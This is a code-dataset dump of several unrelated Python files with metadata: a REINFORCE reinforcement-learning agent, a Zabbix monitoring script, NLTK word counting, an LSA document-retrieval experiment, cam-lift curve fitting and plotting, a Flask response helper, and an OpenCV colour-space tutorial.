'cur_episode': episode\n }, path)\n\n def load_model(self, path, test=False):\n checkpoint = torch.load(path)\n self.actor.load_state_dict(checkpoint['model_state_dict'])\n self.optimizer.load_state_dict(\n checkpoint['optimizer_state_dict'])\n self.cur_episode = checkpoint['cur_episode']\n if test:\n self.actor.eval()\n else:\n self.actor.train()\n\n def learn(self):\n self.optimizer.zero_grad()\n\n # Calcualte discount reward G[]\n G = discount_reward(self.reward_memory, self.gamma)\n\n # Normalize\n mean = np.mean(G)\n std = np.std(G) if np.std(G) > 0 else 1\n G = (G - mean) / std\n\n loss = 0\n for g, logprob in zip(G, self.action_memory):\n loss += -g * logprob\n\n loss.backward()\n self.optimizer.step()\n\n self.clear_memory()\n\n def train(self, env, episodes):\n max_score = -514229\n total_step = 0\n for eps in range(self.cur_episode, episodes):\n state = env.reset()\n score = 0\n done = False\n episode_step = 0\n while not done:\n action = self.predict(state)\n state_, reward, done, _ = env.step(action)\n episode_step += 1\n total_step += 1\n score += reward\n reward = check_reward(\n self.env_name, state, action, reward, state_, done\n )\n self.store_rewards(reward)\n state = state_\n\n self.score_history.append(score)\n max_score = score if score > max_score else max_score\n if score > -1.0 * episode_step:\n self.learn()\n logger.info(\n f\" == episode: {eps+1}, score: {score}, max score: {max_score}\")\n else:\n self.clear_memory()\n\n if (eps + 1) % 100 == 0:\n ckpt_name = os.path.join(\n self.ckpt_save_path, f\"ckpt_{eps}.pth\")\n self.save_model(ckpt_name, eps)\n logger.info(f\" == model {ckpt_name} saved\")\n\n ckpt_name = os.path.join(self.ckpt_save_path, \"ckpt_final.pth\")\n self.save_model(ckpt_name, eps)\n logger.info(f\" == model {ckpt_name} saved\")\n figure_name = os.path.join(\n self.ckpt_save_path, f\"{self.agent_name}.png\")\n plot_figure(figure_name, self.score_history)\n", "sub_path": "models/reinforce.py", "file_name": "reinforce.py", "file_ext": "py", "file_size_in_byte": 4950, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "torch.nn.Module", "line_number": 11, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 11, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 14, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 14, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 15, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 15, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 16, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 16, "usage_type": "name"}, {"api_name": "torch.nn.functional.relu", "line_number": 19, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 19, "usage_type": "name"}, {"api_name": "torch.nn.functional.relu", "line_number": 20, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 20, "usage_type": "name"}, {"api_name": "utils.weight_init", "line_number": 37, "usage_type": "argument"}, {"api_name": "torch.optim.Adam", "line_number": 38, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 38, "usage_type": "name"}, {"api_name": "torch.device", "line_number": 39, "usage_type": "call"}, {"api_name": "torch.cuda.is_available", "line_number": 40, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 40, "usage_type": "attribute"}, {"api_name": "torch.Tensor", "line_number": 47, 
"usage_type": "call"}, {"api_name": "torch.nn.functional.softmax", "line_number": 48, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 48, "usage_type": "name"}, {"api_name": "torch.distributions.Categorical", "line_number": 49, "usage_type": "call"}, {"api_name": "torch.distributions", "line_number": 49, "usage_type": "attribute"}, {"api_name": "torch.Tensor", "line_number": 60, "usage_type": "call"}, {"api_name": "torch.max", "line_number": 61, "usage_type": "call"}, {"api_name": "torch.save", "line_number": 69, "usage_type": "call"}, {"api_name": "torch.load", "line_number": 76, "usage_type": "call"}, {"api_name": "utils.discount_reward", "line_number": 90, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 93, "usage_type": "call"}, {"api_name": "numpy.std", "line_number": 94, "usage_type": "call"}, {"api_name": "utils.check_reward", "line_number": 120, "usage_type": "call"}, {"api_name": "gym.logger.info", "line_number": 130, "usage_type": "call"}, {"api_name": "gym.logger", "line_number": 130, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 136, "usage_type": "call"}, {"api_name": "os.path", "line_number": 136, "usage_type": "attribute"}, {"api_name": "gym.logger.info", "line_number": 139, "usage_type": "call"}, {"api_name": "gym.logger", "line_number": 139, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 141, "usage_type": "call"}, {"api_name": "os.path", "line_number": 141, "usage_type": "attribute"}, {"api_name": "gym.logger.info", "line_number": 143, "usage_type": "call"}, {"api_name": "gym.logger", "line_number": 143, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 144, "usage_type": "call"}, {"api_name": "os.path", "line_number": 144, "usage_type": "attribute"}, {"api_name": "utils.plot_figure", "line_number": 146, "usage_type": "call"}]} +{"seq_id": "75330779", "text": "# __author__: wang_chongsheng\n# date: 2017/10/26 0026\n# --encoding=utf-8\nfrom pyzabbix import ZabbixAPI\n\n\n###pyzabbix\nclass pyzabbixAPI(object):\n def __init__(self):\n self.prioritytostr = {'0': 'ok', '1': '信息', '2': '警告', '3': '严重'} # 告警级别\n\n def login(self):\n '''''\n 进行认证\n 返回 api 接口\n '''\n zapi = ZabbixAPI('http://zabbixdomain.com')\n zapi.login('user', 'pwd')\n return zapi\n\n def getCurIssue(self, zapi):\n '''''\n 获取所有最近有问题的trigger\n 返回trigger的信息列表: ['trigger1','trigger2',......]\n '''\n triggers = zapi.trigger.get(\n only_true=1,\n skipDependent=1,\n monitored=1,\n active=1,\n output='extend',\n expandDescription=1,\n selectHosts=['host'],\n )\n\n # 获取未确认的trigger\n unack_triggers = zapi.trigger.get(\n only_true=1,\n skipDependent=1,\n monitored=1,\n active=1,\n output='extend',\n expandDescription=1,\n selectHosts=['host'],\n withLastEventUnacknowledged=1,\n )\n unack_trigger_ids = [t['triggerid'] for t in unack_triggers]\n for t in triggers:\n t['unacknowledged'] = True if t['triggerid'] in unack_trigger_ids else False\n\n # 每个trigger信息格式 :[时间] 级别:ip - 详情 是否确认\n triggerlist = []\n for t in triggers:\n if int(t['value']) == 1:\n triggerlist.append(\"[{0}] {1} : {2}({3}) - {4} {5}\".format(\n time.strftime(\"%Y-%m-%d %H:%M:%S\", time.localtime(float(t['lastchange']))),\n self.prioritytostr[t['priority']],\n t['hosts'][0]['host'],\n self.getHostgroupName(zapi, t['hosts'][0]['host']),\n t['description'],\n '(Unack)' if t['unacknowledged'] else ''\n )\n )\n return triggerlist\n\n def getHostgroupName(self, zapi, hostname):\n '''''\n 通过hostname(即ip)获取host所在的监控组名\n 返回由组名组成的字符串\n '''\n groups = 
zapi.host.get(\n search={\"name\": hostname},\n selectGroups=['name'],\n output=['groups']\n )[0]['groups']\n groupname = [group['name'] for group in groups]\n return ' '.join(groupname)", "sub_path": "zabbix/trigger.py", "file_name": "trigger.py", "file_ext": "py", "file_size_in_byte": 2515, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "pyzabbix.ZabbixAPI", "line_number": 17, "usage_type": "call"}]} +{"seq_id": "140820866", "text": "#!/usr/bin/env python\n# coding: utf-8\n\n# In[115]:\n\n\nfrom nltk.corpus import reuters \nfrom nltk import word_tokenize\nfrom nltk.stem.porter import PorterStemmer\nimport re\nfrom nltk.corpus import stopwords\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n\n# In[116]:\n\n\nstopwordsList = stopwords.words(\"english\")\ndef tokenize(text):\n min_length = 3\n words = map(lambda word: word.lower(), word_tokenize(text));\n words = [word for word in words if word not in stopwordsList]\n tokens =(list(map(lambda token: PorterStemmer().stem(token), words)));\n p = re.compile('[a-zA-Z]+');\n filtered_tokens = list(filter(lambda token: p.match(token) and len(token)>=min_length, tokens));\n return filtered_tokens\n\n\n# In[117]:\n\n\ndef tf_idf(docs):\n tfidfVectorizer = TfidfVectorizer(tokenizer=tokenize, use_idf=True, sublinear_tf=True);\n matrix = tfidfVectorizer.fit_transform(docs);\n return tfidfVectorizer, matrix;\n\n\n# In[118]:\n\n\ndef transform_query(query, tfidfVectorizer):\n query_trans = tfidfVectorizer.transform([query])\n return query_trans\n\n\n# In[119]:\n\n\ndef train_test_reuiter_data():\n train_doc = []\n test_doc = []\n \n for doc_id in reuters.fileids():\n if doc_id.startswith(\"training\"):\n train_doc.append(reuters.raw(doc_id))\n else:\n test_doc.append(reuters.raw(doc_id))\n sliceObject = slice(5)\n train_doc = train_doc[sliceObject]\n test_doc = test_doc[sliceObject]\n # print('***********************************')\n # print(train_doc)\n #print('***********************************')\n # print(test_doc)\n return train_doc, test_doc\n\n\n# In[120]:\n\n\ndef load_Adi_dataset():\n with open('ADI.ALL') as f:\n temp = []\n for l in f:\n temp.append(l.replace('\\n',' '))\n training = ''.join(temp).replace('.T','').split('.I')\n with open('ADI.QRY') as f:\n temp = []\n for l in f:\n temp.append(l.replace('\\n',' '))\n testing = ''.join(temp).replace('.W','').split('.I')\n del training[0]\n del testing[0]\n \n return training,testing;\n\n\n# In[121]:\n\n\ntrain_doc,test_doc = load_Adi_dataset()\ndef get_Rel_doc(query, k):\n tfidfVectorizer, tfidfmatrix = tf_idf(train_doc)\n tfidfmatrix = (tfidfmatrix.toarray()).T\n u,s,v = np.linalg.svd(tfidfmatrix)\n# print(u)\n# print(s)\n# print(v)\n# input()\n\n uk = u[:,0:k]\n sk = np.diag(s[0:k])\n vk = v[0:k,:]\n print(uk)\n print(sk)\n print(vk)\n print(query)\n input()\n quertT = transform_query(query,tfidfVectorizer).toarray()\n# print(quertT)\n# print(np.dot(query, uk))\n# print(np.linalg.inv(sk))\n queryK = np.dot(np.dot(query, uk), np.linalg.inv(sk))\n \n score = np.dot(queryK, vk)[0] #0the index because it is returning 2d type\n sorted_doc = sorted(range(len(score)), key=lambda k: score[k], reverse = True)\n sorted_doc = [n+1 for n in sorted_doc]\n return sorted_doc\n\n\n# In[122]:\n\n\ndef load_actual_doc(queryFile):\n actual_rel_doc = []\n with open('ADI.REL') as f:\n for l in f:\n temp = l.split()\n if int(temp[0]) == queryFile:\n 
actual_rel_doc.append(int(temp[1]))\n print(actual_rel_doc)\n return actual_rel_doc\n\n\n# In[123]:\n\n\ndef getPrecision(k):\n totalPrecison = 0\n for query_no in range(5):\n actual_rel_docs = load_actual_doc(query_no+1)\n \n predicted_rel_docs = get_Rel_doc(test_docs[query_no], k)\n #print(len(predicted_rel_docs))\n \n print(get_Rel_doc(test_docs[query_no], k))\n count = 0\n for doc_no in actual_rel_docs:\n if predicted_rel_docs.index(doc_no) < len(actual_rel_docs):\n count += 1\n totalPrecison +=count/len(actual_rel_docs)\n print('For K = {} average Precison is {}'.format(k,totalPrecison/5))\n return totalPrecison/5\n \nX = list(range(0, len(train_docs), 5)) \nY = list(map(getPrecision,X))\n\n\nY = [i*100 for i in Y]\nplt.plot(X, Y)\n\n\n# In[ ]:\n\n\n\n\n", "sub_path": "Q1.py", "file_name": "Q1.py", "file_ext": "py", "file_size_in_byte": 4054, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "nltk.corpus.stopwords.words", "line_number": 20, "usage_type": "call"}, {"api_name": "nltk.corpus.stopwords", "line_number": 20, "usage_type": "name"}, {"api_name": "nltk.word_tokenize", "line_number": 23, "usage_type": "call"}, {"api_name": "nltk.stem.porter.PorterStemmer", "line_number": 25, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 26, "usage_type": "call"}, {"api_name": "sklearn.feature_extraction.text.TfidfVectorizer", "line_number": 35, "usage_type": "call"}, {"api_name": "nltk.corpus.reuters.fileids", "line_number": 55, "usage_type": "call"}, {"api_name": "nltk.corpus.reuters", "line_number": 55, "usage_type": "name"}, {"api_name": "nltk.corpus.reuters.raw", "line_number": 57, "usage_type": "call"}, {"api_name": "nltk.corpus.reuters", "line_number": 57, "usage_type": "name"}, {"api_name": "nltk.corpus.reuters.raw", "line_number": 59, "usage_type": "call"}, {"api_name": "nltk.corpus.reuters", "line_number": 59, "usage_type": "name"}, {"api_name": "numpy.linalg.svd", "line_number": 97, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 97, "usage_type": "attribute"}, {"api_name": "numpy.diag", "line_number": 104, "usage_type": "call"}, {"api_name": "numpy.dot", "line_number": 115, "usage_type": "call"}, {"api_name": "numpy.linalg.inv", "line_number": 115, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 115, "usage_type": "attribute"}, {"api_name": "numpy.dot", "line_number": 117, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 162, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 162, "usage_type": "name"}]} +{"seq_id": "588521739", "text": "import numpy as np\nfrom scipy import signal, optimize\nimport tables\n\nfrom engine_parameters import *\n\nprint('load pyplot')\n\nimport matplotlib\nmatplotlib.use('Qt5Agg')\nimport matplotlib.pyplot as plt\n\nprint('done loading pyplot')\n\n# from intake\n# def save(self):\n# angle = np.array(self.cam_profile['cam_position'][1:])[:,1]\n# lift = np.array(self.cam_profile['cam_lift'][1:])[:,1]\n# with tables.open_file('cam.tbl', 'w') as h5_file:\n# h5_file.create_array('/', 'cam_angle', angle)\n# h5_file.create_array('/', 'cam_lift', lift)\n\ndef save(file_, name, data):\n with tables.open_file(file_, 'w') as h5_file:\n h5_file.create_array('/', 'cam_recording', data)\n\ndef load(file_, name):\n with tables.open_file(file_, 'r') as h5_file:\n data = getattr(h5_file.root, name).read()\n return data\n\ndef smooth_lift(ideal_cam_lift, limit=100):\n win = signal.hann(100)\n 
filtered = signal.convolve(\n ideal_cam_lift,\n win,\n mode='same',\n ) / np.sum(win)\n return filtered\n\ndef fft_lift(ideal_cam_lift, limit=200):\n fft_ = np.fft.fft(ideal_cam_lift)\n fft_[int(limit):] = 0.0\n return np.fft.ifft(fft_)\n\ndef plot_S(angle, lift, projection=None):\n ax = plt.subplot(111, projection=projection)\n ax.plot(angle, lift + cam_base_radius, 'r')\n ax.plot(angle, fit_dwell_curve(cam_angle, ideal_cam_lift + cam_base_radius), 'g')\n # ax.plot(angle, fft_lift(lift, 200) + cam_base_radius, 'g')\n # ax.plot(angle, smooth_lift(lift, 100) + cam_base_radius, 'b')\n if projection == 'polar':\n ax.set_theta_zero_location(\"N\")\n ax.set_theta_direction(-1)\n \n ax.set_rmax(max_valve_lift + cam_base_radius)\n ax.set_rmin(0.0)\n\n ax.set_rticks([0.5 * max_valve_lift, max_valve_lift]) # less radial ticks\n ax.set_rlabel_position(-22.5) # get radial labels away from plotted line\n ax.grid(True)\n\n plt.show()\n\ndef plot_FFT(angle, lift, projection='polar'):\n ax = plt.subplot(111, projection=projection)\n ax.set_theta_zero_location(\"N\")\n ax.set_theta_direction(-1)\n ax.plot(angle, lift + cam_base_radius, 'r')\n\n offset = 1\n\n ax.plot(angle, fft_lift(lift, 16+offset) + cam_base_radius, 'g')\n ax.plot(angle, fft_lift(lift, 8+offset) + cam_base_radius, 'b')\n ax.plot(angle, fft_lift(lift, 4+offset) + cam_base_radius, 'xkcd:sky blue')\n ax.plot(angle, fft_lift(lift, 2+offset) + cam_base_radius, 'xkcd:beige')\n\n ax.set_rmax(max_valve_lift + cam_base_radius)\n ax.set_rmin(0.0)\n\n ax.set_rticks([0.5 * max_valve_lift, max_valve_lift]) # less radial ticks\n ax.set_rlabel_position(-22.5) # get radial labels away from plotted line\n ax.grid(True)\n\n plt.show()\n\ndef numerical_vel(angle, lift):\n x = angle\n y = lift\n dy = np.zeros(y.shape,np.float)\n dy[0:-1] = np.diff(y)/np.diff(x)\n dy[-1] = (y[-1] - y[-2])/(x[-1] - x[-2])\n return dy\n\ndef plot_V(angle, lift, projection='polar'):\n ax = plt.subplot(111, projection=projection)\n ax.set_theta_zero_location(\"N\")\n ax.set_theta_direction(-1)\n ax.plot(angle, numerical_vel(angle, lift), 'r')\n ax.plot(angle, numerical_vel(fft_lift(lift)), 'g')\n ax.plot(angle, numerical_vel(smooth_lift(lift)), 'b')\n\n # ax.set_rmax(max_valve_lift)\n ax.set_rmin(min_valve_lift)\n\n ax.set_rticks([0.5 * max_valve_lift, max_valve_lift]) # less radial ticks\n ax.set_rlabel_position(-22.5) # get radial labels away from plotted line\n ax.grid(True)\n\n plt.show()\n\ndef numerical_accel(angle, lift):\n x = angle\n y = numerical_vel(angle, lift)\n dy = np.zeros(y.shape,np.float)\n dy[0:-1] = np.diff(y)/np.diff(x)\n dy[-1] = (y[-1] - y[-2])/(x[-1] - x[-2])\n return dy\n\ndef plot_A(angle, lift, projection='polar'):\n ax = plt.subplot(111, projection=projection)\n ax.set_theta_zero_location(\"N\")\n ax.set_theta_direction(-1)\n ax.plot(angle, numerical_accel(angle, lift), 'r')\n ax.plot(angle, numerical_accel(fft_lift(lift)), 'g')\n ax.plot(angle, numerical_accel(smooth_lift(lift)), 'b')\n\n # ax.set_rmax(max_valve_lift)\n ax.set_rmin(0.0)\n\n ax.set_rticks([0.5 * max_valve_lift, max_valve_lift]) # less radial ticks\n ax.set_rlabel_position(-22.5) # get radial labels away from plotted line\n ax.grid(True)\n\n plt.show()\n\ndef numerical_jerk(angle, lift):\n x = angle\n y = numerical_accel(angle, lift)\n \n dy = np.zeros(y.shape,np.float)\n dy[0:-1] = np.diff(y)/np.diff(x)\n dy[-1] = (y[-1] - y[-2])/(x[-1] - x[-2])\n\n return dy\n\ndef plot_SVA(angle, lift, projection='polar'):\n ax = plt.subplot(111, projection=projection)\n ax.plot(angle, lift, 'r')\n 
ax.plot(angle, numerical_vel(angle, lift), 'g')\n ax.plot(angle, numerical_accel(angle, lift), 'b')\n # ax.plot(angle, numerical_jerk(angle, lift), 'xkcd:sky blue')\n \n if projection == 'polar':\n ax.set_theta_zero_location(\"N\")\n ax.set_theta_direction(-1)\n \n ax.set_rmax(cam_base_radius + max_valve_lift * 2)\n ax.set_rmin(min_valve_lift)\n\n ax.set_rticks([\n cam_base_radius,\n 0.5 * max_valve_lift + cam_base_radius,\n max_valve_lift + cam_base_radius]) # less radial ticks\n ax.set_rlabel_position(-22.5) # get radial labels away from plotted line\n ax.grid(True)\n\n else:\n ax.set_xlabel('Cam rotation (radians)')\n ax.set_ylim([-20, 20])\n ax.set_ylabel('SVA (cm, cm/sec, cm/sec**2)')\n ax.set_title('SVA Diagram')\n\n plt.show()\n\ndef plot_SVAJ(angle, lift, projection='polar'):\n ax = plt.subplot(111, projection=projection)\n ax.plot(angle, lift, 'r')\n ax.plot(angle, numerical_vel(angle, lift), 'g')\n ax.plot(angle, numerical_accel(angle, lift), 'b')\n ax.plot(angle, numerical_jerk(angle, lift), 'xkcd:sky blue')\n \n if projection == 'polar':\n ax.set_theta_zero_location(\"N\")\n ax.set_theta_direction(-1)\n \n ax.set_rmax(max_valve_lift * 1.2)\n ax.set_rmin(min_valve_lift)\n\n ax.set_rticks([0.5 * max_valve_lift, max_valve_lift]) # less radial ticks\n ax.set_rlabel_position(-22.5) # get radial labels away from plotted line\n ax.grid(True)\n\n else:\n ax.set_xlabel('Cam rotation (radians)')\n ax.set_ylim([-20, 20])\n ax.set_ylabel('SVAJ (cm, cm/sec, cm/sec**2, cm/sec**3)')\n ax.set_title('SVAJ Diagram')\n\n plt.show()\n\ndef fit_dwell_curve(angle, lift):\n # start at 0\n # rise\n # dwell at top\n # fall\n # dwell at bottom\n\n def rise(local_angle, total_angle, max_valve_lift):\n nondim_angle = local_angle / total_angle\n x = nondim_angle\n return max_valve_lift * (10*x**3 - 15*x**4 + 6*x**5)\n\n def __rdfd(angle, cam_offset, high_dwell_time, fall_time, low_dwell_time):\n '''\n rdfd(x, a, b, c, d)\n x is independent variable\n a -> d are parameters of the function\n '''\n\n rise_time = 2 * pi - (low_dwell_time + high_dwell_time + fall_time)\n # instead of starting at TDC the intake at the start at 0 - cam_offset\n # then rise from there for rise_time radians\n # then dwell for for high_dwell_time radians\n # then fall from there for fall_time radians\n # then complete the circle for low_dwell_time radians \n angle = angle + cam_offset\n if angle < 0:\n angle += 2 * pi\n elif angle > 2 * pi:\n angle -= 2 * pi\n\n if angle < high_dwell_time:\n return cam_base_radius + max_valve_lift\n\n elif angle < high_dwell_time + fall_time:\n local_angle = angle - (high_dwell_time)\n return cam_base_radius + max_valve_lift - rise(local_angle, fall_time, max_valve_lift)\n\n elif angle < high_dwell_time + fall_time + low_dwell_time:\n return cam_base_radius + 0.0\n\n else:\n local_angle = angle - (high_dwell_time + fall_time + low_dwell_time)\n return cam_base_radius + rise(local_angle, rise_time, max_valve_lift)\n\n _rdfd = np.vectorize(__rdfd)\n\n def rdfd(angle, cam_offset, high_dwell_time, fall_time, low_dwell_time):\n return _rdfd(angle, cam_offset, high_dwell_time, fall_time, low_dwell_time)\n\n # avoid higher order discontinuity\n # minimize difference between ideal and calculated curve\n # maximize area under the curve\n\n # xdata\n xdata = angle\n ydata = lift\n bounds = ([0, 0, pi/8, 0], [pi/2, pi, pi, pi])\n\n initial_guess = [0, pi/2, pi/2, pi/2]\n\n popt, pcov = optimize.curve_fit(rdfd, xdata, ydata, bounds=bounds)\n\n print('Optimized variables to:')\n print('Cam Advance: %.2f' % 
(popt[0] / pi * 180))\n print('TDwell Time: %.2f' % (popt[1] / pi * 180))\n print('Fall Time: %.2f' % (popt[2] / pi * 180))\n print('BDwell Time: %.2f' % (popt[3] / pi * 180))\n print('Rise Time: %.2f' % (360 - ((sum(popt) - popt[0]) / pi * 180)))\n\n lift = _rdfd(xdata, *popt)\n\n return lift\n\nif __name__ == '__main__':\n # note: working on this for one cam lobe at a time\n cam_angle = load('cam.tbl', 'cam_angle')[:,1]\n ideal_cam_lift = load('cam.tbl', 'cam_lift')[:,1]\n\n # plot_FFT(cam_angle, ideal_cam_lift)\n plot_SVA(\n cam_angle,\n fit_dwell_curve(cam_angle, ideal_cam_lift),\n None)\n", "sub_path": "cam_processing.py", "file_name": "cam_processing.py", "file_ext": "py", "file_size_in_byte": 9261, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "matplotlib.use", "line_number": 10, "usage_type": "call"}, {"api_name": "tables.open_file", "line_number": 24, "usage_type": "call"}, {"api_name": "tables.open_file", "line_number": 28, "usage_type": "call"}, {"api_name": "scipy.signal.hann", "line_number": 33, "usage_type": "call"}, {"api_name": "scipy.signal", "line_number": 33, "usage_type": "name"}, {"api_name": "scipy.signal.convolve", "line_number": 34, "usage_type": "call"}, {"api_name": "scipy.signal", "line_number": 34, "usage_type": "name"}, {"api_name": "numpy.sum", "line_number": 38, "usage_type": "call"}, {"api_name": "numpy.fft.fft", "line_number": 42, "usage_type": "call"}, {"api_name": "numpy.fft", "line_number": 42, "usage_type": "attribute"}, {"api_name": "numpy.fft.ifft", "line_number": 44, "usage_type": "call"}, {"api_name": "numpy.fft", "line_number": 44, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 47, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 47, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 63, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 63, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 66, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 66, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 85, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 85, "usage_type": "name"}, {"api_name": "numpy.zeros", "line_number": 90, "usage_type": "call"}, {"api_name": "numpy.float", "line_number": 90, "usage_type": "attribute"}, {"api_name": "numpy.diff", "line_number": 91, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 96, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 96, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 110, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 110, "usage_type": "name"}, {"api_name": "numpy.zeros", "line_number": 115, "usage_type": "call"}, {"api_name": "numpy.float", "line_number": 115, "usage_type": "attribute"}, {"api_name": "numpy.diff", "line_number": 116, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 121, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 121, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 135, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 135, "usage_type": "name"}, {"api_name": "numpy.zeros", "line_number": 141, "usage_type": "call"}, {"api_name": "numpy.float", "line_number": 141, "usage_type": 
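The cam-processing record above builds velocity, acceleration and jerk by chaining one-sided finite differences. A shorter sketch of the same S/V/A/J computation is shown here using np.gradient, which is second-order accurate in the interior and one-sided only at the endpoints; the per-radian units and the angle/lift array layout are assumptions carried over from the record, not part of the original file.

import numpy as np

def svaj(angle, lift):
    # displacement, velocity, acceleration and jerk, all per radian of cam rotation
    vel = np.gradient(lift, angle)
    accel = np.gradient(vel, angle)
    jerk = np.gradient(accel, angle)
    return lift, vel, accel, jerk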
"attribute"}, {"api_name": "numpy.diff", "line_number": 142, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 148, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 148, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 174, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 174, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 177, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 177, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 200, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 200, "usage_type": "name"}, {"api_name": "numpy.vectorize", "line_number": 247, "usage_type": "call"}, {"api_name": "scipy.optimize.curve_fit", "line_number": 263, "usage_type": "call"}, {"api_name": "scipy.optimize", "line_number": 263, "usage_type": "name"}]} +{"seq_id": "26300283", "text": "from json import dumps\nfrom flask import Response\n\nclass BaseResource(object):\n\tdef make_response(self, response, code, header=None):\n\t\tresponse = dumps(response)\n\t\tfinal_response = Response(response, status=code, mimetype='application/json')\n\n\t\tif header:\n\t\t\tfor key, value in header.items():\n\t\t\t\tfinal_response.headers[key] = value\n\n\t\treturn final_response", "sub_path": "core/resource_core.py", "file_name": "resource_core.py", "file_ext": "py", "file_size_in_byte": 358, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "json.dumps", "line_number": 6, "usage_type": "call"}, {"api_name": "flask.Response", "line_number": 7, "usage_type": "call"}]} +{"seq_id": "537148892", "text": "import nltk\nimport codecs\nfrom nltk.tokenize import word_tokenize\nfrom nltk.corpus import stopwords\n#with open('three.txt', 'r') as f2:\nwith codecs.open('our.txt', 'r', \"utf-8-sig\") as f2:\n data = f2.read()\n print(data)\ntokens = word_tokenize(data)\ntext = nltk.Text(tokens)\n\nsr= stopwords.words('english')\nclean_tokens = tokens[:]\nfor token in tokens:\n if token in stopwords.words('english'):\n \n clean_tokens.remove(token)\nfreq = nltk.FreqDist(clean_tokens)\nfor key,val in freq.items():\n key = key.encode(\"UTF-8\", \"replace\")\n print(str(key) + ':' + str(val))\nfreq.plot(20, cumulative=False)\n", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 620, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "codecs.open", "line_number": 6, "usage_type": "call"}, {"api_name": "nltk.tokenize.word_tokenize", "line_number": 9, "usage_type": "call"}, {"api_name": "nltk.Text", "line_number": 10, "usage_type": "call"}, {"api_name": "nltk.corpus.stopwords.words", "line_number": 12, "usage_type": "call"}, {"api_name": "nltk.corpus.stopwords", "line_number": 12, "usage_type": "name"}, {"api_name": "nltk.corpus.stopwords.words", "line_number": 15, "usage_type": "call"}, {"api_name": "nltk.corpus.stopwords", "line_number": 15, "usage_type": "name"}, {"api_name": "nltk.FreqDist", "line_number": 18, "usage_type": "call"}]} +{"seq_id": "325427267", "text": "\"\"\"\n 09. 색공간 바꾸기 및 색 추적\n\n 1. BGR 색공간을 Gray로 변경하거나, HSV로 변경하기\n 2. 
Extract only a specific color from the video frames and track it\n\n cv2.cvtColor()\n Converts a color created in the BGR color space into its HSV values\n\n cv2.inRange()\n Checks whether each value of the hsv source lies in the range given by lower_blue and upper_blue,\n then returns a result that keeps in-range values as they are and fills the rest with 0.\n\n\n\n OpenCV provides more than 150 color-space conversion methods.\n Here, however, we will only cover the most widely used conversions,\n BGR - GRAY and BGR - HSV.\n\n BGR determines a single color from its Blue, Green and Red values.\n HSV determines a color from Hue, Saturation and Value.\n OpenCV defines the range of Hue as [0, 179],\n and the ranges of Saturation and Value as [0, 255].\n\n\"\"\"\n\nimport numpy as np\nimport cv2\n\ndef hsv():\n blue = np.uint8([[[255, 0, 0]]])\n # create a numpy array for a single blue pixel\n green = np.uint8([[[0, 255, 0]]])\n red = np.uint8([[[0, 0, 255]]])\n\n hsv_blue = cv2.cvtColor(blue, cv2.COLOR_BGR2HSV)\n # convert the blue created in BGR into HSV values and store them in hsv_blue\n hsv_green = cv2.cvtColor(green, cv2.COLOR_BGR2HSV)\n hsv_red = cv2.cvtColor(red, cv2.COLOR_BGR2HSV)\n\n print('hsv for blue : ', hsv_blue)\n print('hsv for green : ', 